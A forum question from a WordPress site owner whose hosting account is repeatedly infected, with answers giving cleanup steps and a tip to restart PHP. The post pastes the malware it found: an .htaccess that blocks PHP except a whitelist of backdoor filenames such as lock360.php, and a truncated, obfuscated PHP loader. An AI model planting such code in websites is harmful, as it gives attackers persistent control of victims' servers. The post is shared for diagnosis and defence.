# Virus injected to my wordpress site

Tags: html, seo

Recently my wordpress site has been injected with some sort of virus, and all the other non-wordpress sites too have been affected. Mainly in every folder either a .php, .txt and .htaccess is created with a suspicious code, I'm not sure attaching the code here is a wise idea, anyways will try. Mainly, now the issue is its deeply infected my entire hosting account. deleted the files individually many times, yet again it repeats itself. Any suggestions how to fix these.

Secondly, one my domain site:https://providentecopolitan.gen.in/ there are 30K urls that has been indexed by google, have asked for URL removal request from search console. Is there anything I can do? or missing , Does it effect my SEO?

.htaccess

```
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


<?php
$O00OO0___O=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO_0O0_O0_=$O00OO0___O[40].$O00OO0___O[13].$O00OO0___O[53].$O00OO0___O[31].$O00OO0___O[21].$O00OO0___O[46].$O00OO0___O[10].$O00OO0___O[56].$O00OO0___O[0].$O00OO0___O[5].$O00OO0___O[13].$O00OO0___O[31].$O00OO0___O[15].$O00OO0___O[13].$O00OO0___O[10].$O00OO0___O[56].$O00OO0___O[53].$O00OO0___O[31].$O00OO0___O[21].$O00OO0___O[13].$O00OO0___O[31];$O0_O_O00O_=$O00OO0___O[44].$O00OO0___O[53].$O00OO0___O[31].$O00OO0___O[65].$O00OO0___O[10].$O00OO0___O[53].$O00OO0___O[31].$O00OO0___O[44].$O00OO0___O[39].$O00OO0___O[21].$O00OO0___O[56].$O00OO0___O[31].$O00OO0___O[10].$O00OO0___O[56].$O00OO0___O[21].$O00OO0___O[39].$O00OO0___O[39].$O00OO0___O[3].$O00OO0___O[21].$O00OO0___O[56].$O00OO0___O[25];$O00__OO0O_=$O00OO0___O[40].$O00OO0___O[13].$O00OO0___O[53].$O00OO0___O[31].$O00OO0___O[21].$O00OO0___O[4
```

Answer (score 1):

Although hacked sites are not within scope here (and your question will be closed because of that policy), there are questions here about hacked sites that have answers that will be helpful (I've written a couple of them).

Cleanup is time-consuming, but possible. Generally -

1. Change passwords on everything, including your admin-level user and hosting and FTP and databases.
2. Manually reinstall WP Core, themes, and plugins. Delete any unused themes and plugins.
3. Look at all files for added code (like in your htaccess file). Look for htaccess files in other folders.
4. Look at contents of all ICO files (malware can be in a fake ICO file).
5. Remove any improper admin-level accounts. Make a new admin-level account, login as that new account, and then remove the old admin account.
6. Use strong passwords everywhere
7. Repeat the above steps as needed to ensure there is no reinfection.

Watch your SEO. Resubmit your sitemap files to the search engines. It will take a while for search results to update.

I wrote about the above processes on my site (as well as in answers here) - see https://www.securitydawg.com/recovering-from-a-hacked-wordpress-site/ and other entries on the site.

Good luck.

Answer (score 0):

The lock360.php hack runs in memory to regenerate the malicious code, so after following @Rick Hellewell's answer, make sure to restart the php process. In my case I restarted the server.